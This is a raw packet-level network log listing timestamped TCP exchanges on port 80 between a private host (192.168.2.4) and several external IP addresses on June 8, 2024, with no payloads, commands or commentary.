Jun 8, 2024 18:15:56.393179893 CEST	80	49755	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:56.393246889 CEST	49755	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:56.395760059 CEST	49755	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:56.401839018 CEST	80	49755	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:57.317339897 CEST	80	49755	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:57.367460966 CEST	49755	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:57.476094007 CEST	80	49755	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:57.479650021 CEST	49755	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:57.912914991 CEST	49755	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:58.932863951 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:58.937802076 CEST	80	49756	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:58.937870026 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:58.940135956 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:58.944992065 CEST	80	49756	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:59.785556078 CEST	80	49756	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:59.834825039 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:15:59.916887045 CEST	80	49756	91.195.240.94	192.168.2.4
Jun 8, 2024 18:15:59.919096947 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:00.444933891 CEST	49756	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:01.462678909 CEST	49757	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:01.467602968 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.467747927 CEST	49757	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:01.471256971 CEST	49757	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:01.476284981 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476319075 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476413012 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476464033 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476558924 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476594925 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476603985 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476733923 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:01.476787090 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:02.975414991 CEST	49757	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:02.980833054 CEST	80	49757	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:02.980886936 CEST	49757	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:03.993077993 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:03.998411894 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:03.998514891 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:04.000262976 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:04.005132914 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203635931 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203660011 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203670979 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203682899 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203694105 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203743935 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203758001 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203768015 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203790903 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.203809977 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203820944 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.203902960 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.203902960 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.208862066 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.208903074 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.209112883 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.330971003 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.330981970 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.331162930 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.409667969 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.409691095 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.409701109 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.409745932 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.409758091 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.409781933 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.409925938 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.410058022 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.410077095 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.410089016 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.410192013 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.410479069 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.458453894 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:05.458662033 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.463093042 CEST	49758	80	192.168.2.4	91.195.240.94
Jun 8, 2024 18:16:05.467955112 CEST	80	49758	91.195.240.94	192.168.2.4
Jun 8, 2024 18:16:18.607585907 CEST	49759	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:18.612560987 CEST	80	49759	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:18.612652063 CEST	49759	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:18.614746094 CEST	49759	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:18.619663954 CEST	80	49759	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:19.287386894 CEST	80	49759	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:19.319566011 CEST	80	49759	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:19.319730997 CEST	49759	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:20.134502888 CEST	49759	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:21.150814056 CEST	49760	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:21.156021118 CEST	80	49760	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:21.159507036 CEST	49760	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:21.162584066 CEST	49760	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:21.167994022 CEST	80	49760	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:21.828949928 CEST	80	49760	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:21.860857010 CEST	80	49760	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:21.861063957 CEST	49760	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:22.662575960 CEST	49760	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:23.683063984 CEST	49761	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:23.688185930 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.690794945 CEST	49761	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:23.694814920 CEST	49761	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:23.699810028 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.699963093 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.699995041 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700047016 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700076103 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700174093 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700228930 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700279951 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:23.700309992 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:24.357729912 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:24.390363932 CEST	80	49761	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:24.390415907 CEST	49761	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:25.209656954 CEST	49761	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.230154991 CEST	49762	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.235341072 CEST	80	49762	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:26.235424042 CEST	49762	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.238579035 CEST	49762	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.243518114 CEST	80	49762	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:26.894746065 CEST	80	49762	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:26.927344084 CEST	80	49762	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:26.927493095 CEST	49762	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.928545952 CEST	49762	80	192.168.2.4	66.29.149.46
Jun 8, 2024 18:16:26.933458090 CEST	80	49762	66.29.149.46	192.168.2.4
Jun 8, 2024 18:16:32.026793003 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:32.032007933 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:32.032197952 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:32.033912897 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:32.039140940 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:32.869987965 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:32.912514925 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:33.538299084 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.029495955 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:34.029623985 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.031419992 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:34.031516075 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.031857014 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:34.032310009 CEST	80	49763	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:34.032378912 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.032378912 CEST	49763	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.557116032 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.562593937 CEST	80	49764	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:34.562670946 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.564848900 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:34.570317030 CEST	80	49764	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:35.402273893 CEST	80	49764	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:35.443782091 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:35.537681103 CEST	80	49764	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:35.538064003 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:36.070754051 CEST	49764	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:37.087421894 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:37.092308044 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.092504978 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:37.094589949 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:37.099559069 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099575043 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099591017 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099646091 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099658966 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099740982 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099754095 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099805117 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.099817991 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.934648037 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:37.975032091 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:38.059290886 CEST	80	49765	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:38.063536882 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:38.600332022 CEST	49765	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:39.618858099 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:39.623955011 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:39.624135017 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:39.628598928 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:39.633739948 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:40.905549049 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:40.905626059 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:40.905643940 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:40.905759096 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:40.905802011 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:40.905802011 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:40.908461094 CEST	49766	80	192.168.2.4	195.110.124.133
Jun 8, 2024 18:16:40.913264036 CEST	80	49766	195.110.124.133	192.168.2.4
Jun 8, 2024 18:16:46.404553890 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:46.409476042 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:46.409543037 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:46.411818027 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:46.416703939 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.083688021 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.083710909 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.083729982 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.083744049 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.083780050 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:47.083825111 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:47.085429907 CEST	80	49767	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:47.085479021 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:47.928231955 CEST	49767	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:48.958152056 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:48.963187933 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:48.963270903 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:48.965718985 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:48.970649004 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634478092 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634527922 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634566069 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634603024 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:49.634605885 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634638071 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.634674072 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:49.636015892 CEST	80	49768	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:49.636185884 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:50.475161076 CEST	49768	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:51.494609118 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:51.500433922 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.500808954 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:51.503086090 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:51.508621931 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508642912 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508657932 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508671999 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508685112 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508698940 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508724928 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508738041 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:51.508753061 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.171715975 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.171741009 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.171760082 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.171775103 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.171787024 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:52.171818972 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:52.173372984 CEST	80	49769	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:52.173419952 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:53.006486893 CEST	49769	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.025420904 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.030582905 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:54.030724049 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.032572985 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.037476063 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:54.673671007 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:54.673696041 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:54.673821926 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.674570084 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:16:54.674621105 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.676639080 CEST	49770	80	192.168.2.4	23.227.38.74
Jun 8, 2024 18:16:54.681478024 CEST	80	49770	23.227.38.74	192.168.2.4
Jun 8, 2024 18:17:00.373152018 CEST	49771	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:00.382365942 CEST	80	49771	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:00.382433891 CEST	49771	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:00.384543896 CEST	49771	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:00.389447927 CEST	80	49771	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:01.144393921 CEST	80	49771	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:01.145881891 CEST	80	49771	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:01.145932913 CEST	49771	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:01.897037983 CEST	49771	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:02.916965008 CEST	49772	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:02.921936989 CEST	80	49772	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:02.922055960 CEST	49772	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:02.924360037 CEST	49772	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:02.929353952 CEST	80	49772	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:03.681165934 CEST	80	49772	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:03.682827950 CEST	80	49772	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:03.683177948 CEST	49772	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:04.428503990 CEST	49772	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:05.446774960 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:05.451733112 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.451824903 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:05.456619024 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:05.461615086 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461638927 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461728096 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461746931 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461839914 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461848974 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461941004 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.461961985 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:05.462071896 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:06.214567900 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:06.217516899 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:06.217577934 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:06.219325066 CEST	80	49773	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:06.219383955 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:06.959490061 CEST	49773	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:07.978180885 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:07.983123064 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:07.983277082 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:07.985296011 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:07.990155935 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.746558905 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.746596098 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.746607065 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.746617079 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.746649027 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:08.746730089 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:08.755497932 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.755518913 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.755601883 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:08.757494926 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:08.757539988 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:08.759846926 CEST	49774	80	192.168.2.4	34.111.148.214
Jun 8, 2024 18:17:08.764760017 CEST	80	49774	34.111.148.214	192.168.2.4
Jun 8, 2024 18:17:14.017353058 CEST	49775	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:14.022260904 CEST	80	49775	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:14.022922993 CEST	49775	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:14.026648045 CEST	49775	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:14.031529903 CEST	80	49775	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:14.654145002 CEST	80	49775	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:14.675165892 CEST	80	49775	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:14.675231934 CEST	49775	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:15.540606022 CEST	49775	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:16.557293892 CEST	49776	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:16.562166929 CEST	80	49776	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:16.562239885 CEST	49776	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:16.564416885 CEST	49776	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:16.569269896 CEST	80	49776	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:17.184549093 CEST	80	49776	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:17.207290888 CEST	80	49776	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:17.207357883 CEST	49776	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:18.070914984 CEST	49776	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:19.088299036 CEST	49777	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:19.093367100 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.093444109 CEST	49777	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:19.095727921 CEST	49777	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:19.100686073 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.100744009 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.100826025 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.100841045 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.100964069 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.101025105 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.101053953 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.101079941 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.101089954 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.722812891 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.723282099 CEST	80	49777	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:19.723401070 CEST	49777	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:20.600251913 CEST	49777	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:21.618629932 CEST	49778	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:21.623744965 CEST	80	49778	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:21.624722958 CEST	49778	80	192.168.2.4	217.196.55.202
